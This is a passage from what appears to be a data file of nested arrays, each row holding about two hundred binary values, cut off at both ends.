1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,1,1,1,1,1,0,1,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,1,1,0,0,1,0,1,1,1,0,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,1,1,1,0,1,0,1,0,0,1,1,0,0,0,0,1],[1,0,1,1,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,1,1,1,0,0,1,0,0,0,0,0,0,1,1,1,1,0,0,1,0,0,1,1,0,1,1,1,0,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,0,1,0,1,0,1,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,1,1,1,1,1,0,1,1,0,0,1,1,1,0,0,0,0,1,0,0,0,0,1,1,1,1,1,0,1,1,0,1,1,1,1,0,1,1,1,1,0,1,1,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1,1,1,1,0,0,0,1,1,0,1,0,1],[0,0,1,1,1,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,1,0,1,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,1,1,0,0,1,1,0,0,1,0,1,0,1,0,0,1,0,0,1,0,1,1,0,1,0,0,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,1,1,0,0,0,0,1,1,1,0,1,0,1,0,1,0,1,0,0,1,0,1,1],[1,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,1,1,1,1,0,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,1,1,1,1,0,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,0,0,0,0,0,0,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,0,1,1,1,1],[1,0,0,1,0,0,1,0,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,1,0,1,0,1,1,1,1,1,0,0,1,0,0,0,1,0,0,1,1,0,1,1,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,1,1,0,0,0,1,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,1,0,0,1,1,0,1,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,0,0,1,0,1,0,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,0,1],[1,1,0,0,1,0,0,1,1,1,1,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,1,0,0,0,1,0,0,1,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,1,1,0,1,1,1,1,1,1,0,0,1,1,1,1,1,0,1,1,0,1,1,0,0,1,1,1,1,0,0,1,0,1,1,0,1,0,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,1,1,1,0,1,1,0,1,1,0,0,1,1,1,0,0,0,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,1,1,0,1],[1,1,0,0,1,1,0,0,0,1,1,1,1,0,0,1,1,1,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,1,0,0,1,1,1,1,1,1,1,0,0,0,1,0,0,0,0,1,0,1,1,0,1,0,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,1,1,0,1,0,1,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,1],[1,0,1,1,0,1,0,0,0,1,1,0,1,0,1,0,1,0,1,0,0,0,0,1,1,1,0,1,0,0,1,1,0,1,1,1,0,1,1,1,0,1,1,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,1,0,1,1,1,1,1,0,0,1,0,1,1,0,1,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,1,0,1,1,0,0,1,0,1,0,0,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,1,0,0,1,0,1,0,1,1,0,1,1,0,1,0,0,0,0,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,0,1,0,1,1,0,1,0,0,0,0,0,1,0],[0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,1,0,1,1,0,1,1,1,1,0,1,1,1,0,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,1,1,0,0,1,1,0,0,0,1,1,1,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,0,0,1,0,1,0,1,1,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,0,1,1,1,1,0,0,0,0,0,1,0,0,0],[1,0,0,1,1,0,0,1,0,0,1,1,0,1,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,0,1,1,1,1,0,0,0,1,1,1,1,1,1,1,0,0,0,1,0,1,0,0,0,1,1,1,1,1,0,1,0,1,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,1,1,1,1,0,0,1,1,1,0,1,0,1,1,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,0,0,0,1,1,1,0,0,0,1,0,0,1,1,1,0,0,1,1,1,0,1,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,1,1,0,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,0,1,1,1,1,0,0,1,1,0,1,1,1],[0,0,0,0,1,1,0,1,0,0,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,0,1,0,1,0,0,0,1,0,1,1,0,1,1,1,1,1,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,1,1,0,1,0,0,0,0,1,1,1,1,1,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,0,1,1,1,1,1,0,1,0,0,1,0,0,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,1,1,0,1,1,0,1,0,0,1,0,1,0,1,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,0,0,0,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,1,0,0,0,1,0,1,1,1,0,1,1,1,0,1,0,1,1,1,0,0,0,0,1,0],[1,1,0,1,1,0,1,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,1,1,1,1,0,0,0,0,0,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,1,1,0,1,1,0,1,1,1,0,0,1,1,0,1,0,0,1,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,1,0,1,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,1,0,1,1,1,0,0,1,1,0,0,1,1,0,0,1,1,1,0,1,1,0,0,1,1,1,0,1,1,1,1,1,1,0,1,0],[0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,0,0,1,1,1,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,0,1,1,1,0,1,1,1,1,1,1,0,1,0,1,1,0,1,0,0,1,1,1,1,0,0,0,0,0,0,1,0,1,0,0,0,0,1,1,1,0,1,0,0,0,0,1,1,0,1,1,1,1,1,0,1,0,0,1,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,1,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,0,1,1,0,1,0,0,0,1,0,1,0,1,0,1,0,0,0,0,1,0,1,1,1,0,0,0],[0,1,1,0,1,1,0,1,0,0,1,0,1,0,1,0,0,1,1,0,0,0,1,1,0,0,0,1,1,0,1,0,1,0,0,1,1,0,1,1,1,0,1,1,1,0,0,1,1,1,1,1,1,1,0,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,0,0,0,0,1,1,0,1,0,1,1,1,1,0,0,0,0,1,1,1,0,1,1,1,0,1,0,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,1,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,0,1,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,1,0,0,1,0,1,1,0,1,1,1,0,1,1,0,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,0,0,0,1,1,1],[1,1,1,0,0,1,0,1,1,1,1,0,0,0,0,1,0,0,1,1,1,1,1,0,1,1,1,1,0,1,1,0,0,1,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,1,1,1,1,1,0,0,0,1,0,1,1,0,1,0,1,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,1,0,1,1,1,0,0,0,1,0,1,0,0,1,1,0,0,1,1,1,0,0,0,0,0,1,1,0,0,1,1,1,0,1,0,0,1,1,1,0,1,1,1,1,0,1,1,1,0,0,0,1,1,1,0,1,0,0,1,0,0,1,0,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,1,1,1,1,1,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,1,1,0,0,1],[0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,1,1,1,0,1,0,1,0,0,0,1,1,1,0,1,1,1,1,1,0,0,1,0,0,0,0,1,0,1,1,0,0,0,1,1,0,1,0,1,1,0,1,1,0,0,1,1,1,0,0,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,1,1,0,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,0,0,1,0,0,0,1,0,0,1,0,0,1,0,0,0,1,1,1,1,1,0,0,1,0,1,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,1,0,1,0,1,1,1,1,0,0,1,0,0,0,0,0,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,0,1,1,0,1,1,0,1,1,0,1,0,1,1,0,0,0,0,1,0,0,1,0,1,1,1,0],[1,0,0,1,1,0,1,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,1,0,1,1,0,1,1,0,1,0,1,0,0,1,1,1,0,0,1,0,1,0,1,0,1,0,0,1,0,1,1,0,1,1,1,1,1,1,1,0,1,1,0,1,0,0,0,0,1,0,1,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,0,1,1,0,1,1,1,1,0,1,0,0,1,0,1,0,1,0,1,1,1,1,0,0,0,1,1,0,1,0,1,1,1,1,1,0,1,1,1,1,0,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,0,1,1,1,0,1,1,0,1,0,1,0,1,0,1,0,1,1,0,0,0,0,1,1,1,1,0,1,0,1,1,1,1,0,1,0,0,1,1,0,0],[0,0,0,1,0,0,1,0,0,0,0,0,1,1,1,1,1,0,0,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,0,0,1,0,1,1,1,1,1,0,1,0,0,1,1,1,1,0,0,0,0,1,1,0,1,1,0,1,1,1,1,0,1,0,0,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,1,0,1,0,1,0,1,1,0,0,0,0,0,0,1,1,1,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,1,1,1,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,0,0,0,1,1,0,0,1,0,1,1,0],[1,0,0,0,0,0,1,1,0,0,1,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,1,1,0,0,0,1,1,0,0,0,1,1,1,0,0,0,1,0,0,0,0,0,0,1,1,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,1,1,1,0,0,0,1,1,1,1,0,1,0,0,0,0,1,1,1,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,1,0,1,1,1,1,1,0,0,1,1,0,0,1,1,0,1,0,0,1,1,0,0,1,0,1,1,1,0,0,1,1,0,1,0,0,1,0,1,1,0,0,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,1,0,1,1,0,0,0,0,1,0,1,1,0,1,0,1,0,0,1,1,1,1,0,0,1,0,0],[1,0,0,1,0,1,0,1,1,1,1,1,1,1,0,1,0,1,0,0,1,0,1,1,1,1,1,1,1,1,1,0,1,1,0,0,0,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,0,0,1,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,1,1,1,1,1,0,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,1,1,0,0,0,1,1,0,0,1,1,0,1,0,1,0,1,1,1,0,0,1,0,0,1,1,0,1,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,1,0,1,1,0,0,1,1,1,0,1,1,0,1,0,0,0,0,1,1,1,0,1,0,0,1,0,1,0,0,1],[1,0,0,0,1,1,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,1,0,1,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,0,0,0,1,0,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,0,0,1,1,1,0,0,1,0,1,0,1,0,0,1,1,0,1,0,0,1,1,0,1,0,1,1,0,0,1,0,1,0,0,1,0,1,1,1,0,0,0,1,1,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,1,0,1,1,0,0,0,1,0,1,1,0,1,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,1,0,0],[1,0,1,1,0,0,1,0,0,0,1,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,1,0,1,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,1,1,1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,1,0,1,1,1,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,0,0,1,0,1,1,0,1,1,1,0,1,1,0,1,1,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,0,0,1,1,1,1,0,0,1,1,0,1,1,0,1,0,0,0,1,1,1,1,0,0,0],[1,0,0,1,0,0,1,1,1,0,1,1,1,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,0,1,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,1,1,0,0,1,0,1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,0,1,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,1,0,0,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,0,1,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,0,0,0,1],[1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,1,1,0,0,0,1,1,1,1,0,1,0,1,0,1,0,1,1,0,1,0,1,0,1,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,0,1,0,0,1,1,1,1,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,1,1,0,1,1,0,1,1,0,1,1,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,0,0,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,0,1,1,1,0,0,1,1,1,1,0,0,1,1,1,1,0,1,0,0,1,1,0,0,1,1,0,1,0,0,1,0,1,1,0,0,1,1,1,1,0,1,0,1,0,0,1,0,1,1,1,0,0,1,1,1,1,1,1],[1,1,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,1,1,0,0,1,1,0,1,1,0,1,0,1,0,1,0,0,1,1,1,1,1,0,0,0,0,1,0,1,1,0,1,0,1,0,1,1,0,0,0,1,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,1,0,0,1,1,0,1,0,1,0,0,0,0,0,1,1,1,0,1,1,0,1,0,0,1,1,0,0,0,1,1,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,1,1,0,0,1,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,0,1,0,1,1,1,1,0,0,1,0,1,0,1,1,1,0,0,1,0,1,0,1],[1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,1,1,0,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,1,1,1,0,0,1,1,1,1,0,0,0,0,0,1,1,1,1,0,1,0,1,1,1,0,0,0,1,1,1,1,0,0,0,0,0,1,0,1,0,1,1,1,0,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,0,1,0,1,1,1,1,0,0,1,1,0,1,1,1,0,0,0,0,1,0,1,1,0,1,0,0,1,1,1,0,0,1,0,1,1,1,0,1,1,1,1,1,0,1,1,0,0,0,1,0,1,1,0,0,0,1,0,0,1,1,1,1,1,1,0,0,1,0,1,0,1,0,0,0,1,1,0,1,1,1,0,1,1,1,1,1,1],[1,0,0,1,1,1,0,0,0,1,0,0,0,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,0,1,1,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,1,1,0,1,1,0,0,1,0,1,0,1,0,1,1,0,0,1,1,1,0,1,0,1,1,0,0,0,0,1,1,0,1,1,1,0,1,0,0,0,0,1,0,0,1,1,0,1,1,0,1,1,1,0,1,0,1,0,1,0,0,1,0,1,1,0,0,0,1,1,0,0,1,1,0,1,1,0,0,0,0,0,0,0,1,0,0,1,1,1,0,1,0,0,0,1,1,0,1,1,1,1,0,1,0,0,1,0,0,0,1,0,0,1,1,1,1,0,1,1,0,1,0,0,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,1,1,0],[0,1,1,0,0,1,0,1,1,0,0,0,1,0,1,1,1,1,0,0,0,1,1,0,1,1,1,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,0,0,1,0,1,1,1,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,0,1,1,0,1,0,1,1,1,1,1,1,1,0,1,1,0,1,0,1,1,0,0,1,1,1,1,0,1,1,1,0,0,1,1,1,1,0,1,1,0,1,0,1,1,0,0,0,1,0,1,1,0,1,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,1,1,1,1,1,1,0,1,0,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,1,0,1,0,0,1,0],[1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,1,1,0,0,1,1,1,1,0,0,1,1,0,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,0,1,1,1,0,1,0,1,0,0,1,0,1,0,1,0,1,1,0,0,1,0,1,0,0,1,1,1,0,0,0,1,0,1,0,0,1,0,0,0,1,0,1,0,1,1,1,0,1,1,1,1,0,0,0,0,0,0,1,0,1,1,0,1,1,1,0,0,0,0,1,0,1,1,1,0,0,1,1,0,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,1,1,1,0,1,0,0,1,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,1,0,1,0,0,0],[0,0,1,1,0,1,1,0,1,0,0,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,1,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,1,0,0,1,0,1,1,0,0,0,1,0,0,0,0,0,1,0,1,0,1,0,0,1,0,1,1,0,1,0,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,0,1,0,1,1,0,1,0,0,0,1,1,0,0,1,1,0,1,1,0,0,0,1,0,0,1,0,1,1,1,0,0,0,1,0,0,1,1,0,1,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,1,0,1,1],[1,0,1,0,0,1,0,1,0,1,1,1,1,1,0,0,1,1,1,1,1,0,0,0,0,0,1,0,1,1,1,0,1,0,0,1,0,0,0,0,1,0,1,1,1,1,0,0,1,1,1,1,0,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,0,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,1,1,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,0,1,0,0,1,1,1,0,1,1,1,1,1,0,1,0,0,0,1,0,1,1,1,1,1,1,0,1,0,1,0,1,0,0,0,1,1,0,0,0,0,1,1,1,1,1,1,1,0,1,1,0,0,1,1,1,1,0,0,0,0,0,0,1,1,0,0,1,0,1,1],[0,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,1,0,0,1,0,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,1,1,0,0,1,1,0,1,1,1,1,0,1,1,1,1,1,1,0,0,1,1,0,1,0,1,1,0,1,1,0,1,0,1,1,1,0,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,1,0,1,1,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,1,0,1,0,0,1,1,1,0,1,0,1,0,0,1,1,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,0,0,0,1,1,0,1,1,0,1,1,1,1,1,1,0,0,1,1,0,1,0,0,1,0,1,0,1,1,0,1,0,1,0,1,1],[1,0,0,1,0,0,1,0,1,1,0,0,1,0,0,1,1,0,1,1,1,1,0,0,1,0,0,1,1,1,0,1,0,0,1,0,1,1,0,1,0,1,0,1,0,0,1,0,0,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,0,1,0,1,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,1,0,1,0,0,1,1,1,1,0,0,1,1,0,1,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,0,1,1,0,1,1,1,0,1,0,0,1,1,0,1,1,0,1,1,0,1,1,0,1,1,0,1,0,1,1,1,0,0,1,0,0,1,1,1,0,0,1,0,0,1,0,0,0,1,1,1,0,1,0,0,1,0,1,1],[0,1,1,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,1,1,0,1,0,0,1,0,0,0,1,1,1,1,1,1,1,0,1,1,1,1,0,0,0,0,1,0,0,0,0,1,0,0,1,1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,0,0,1,1,1,1,0,0,0,0,1,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,1,0,0,1,1,1,0,0,1,0,1,1,0,0,0,0,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,1,0,0,0,1,1,1,0,1,0,0,1,0,0,0,1,0],[1,0,1,0,0,0,0,0,1,1,1,0,1,0,0,0,1,0,1,1,1,1,0,1,1,1,0,0,0,1,1,0,1,1,1,1,1,1,1,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,0,1,0,0,0,0,1,1,0,1,0,0,1,1,1,0,0,0,1,1,0,1,0,0,1,1,1,1,1,1,0,0,1,1,1,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,1,1,0,1,0,0,1,1,1,0,0,1,0,1,0,0,0,1,1,1,0,0,1,0,1,1,1,1,1,0,1,0,1,0,1,1,0,0,1,0,1,1,1,1,1,0,1,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,1,1],[0,1,1,1,0,0,1,0,0,0,1,1,0,1,1,1,1,0,1,1,1,0,1,1,0,1,1,1,1,1,0,0,1,0,1,1,1,0,1,0,1,1,1,0,1,0,1,0,0,1,1,0,0,0,0,0,1,0,1,0,1,0,1,0,1,1,1,1,1,1,0,1,1,0,1,1,0,1,0,1,0,1,1,0,0,0,1,1,1,1,1,0,0,0,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,1,1,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,1,1,0,1,1,0,0,1,1,0,0,1,0,0,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,1,1,1,0,1,1,1,0,1,0,0,0,1,1,1,0,1,1,1,1,1,1,0,0,0,1,1,0,0,0,0,1,0,1,0,0,0,0,1,1,0,1],[0,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,1,1,1,0,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,1,0,1,1,1,0,1,1,1,0,0,1,0,0,1,1,1,0,0,1,1,1,0,1,0,0,0,0,0,1,1,0,0,0,1,1,0,1,1,1,1,1,1,0,0,0,0,0,0,0,1,1,0,1,0,1,0,1,1,1,0,1,0,1,1,1,1,0,1,0,0,0,1,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,1,0,0,0,0,1,1,1,1,0,0,1,1,1,1,0,0,0,1,1,0,0,1,1,1,0,1,1,1,1,0,1,1,0,0,1,1,1,1,1,1,0,0,1,0,1,1,1,0,1,1,1,0,0,1,1,0,1,1,0,1,1,1],[1,0,1,0,1